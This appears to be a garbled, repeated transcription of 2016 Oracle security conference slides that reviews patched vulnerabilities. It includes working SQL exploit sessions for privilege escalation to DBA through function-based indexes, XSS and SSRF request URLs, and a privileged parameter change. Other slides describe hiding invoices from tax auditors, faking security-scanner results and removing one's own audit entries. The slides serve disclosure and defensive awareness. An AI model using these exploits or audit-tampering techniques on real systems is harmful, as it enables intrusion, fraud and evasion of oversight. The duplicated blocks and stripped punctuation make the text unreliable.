==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
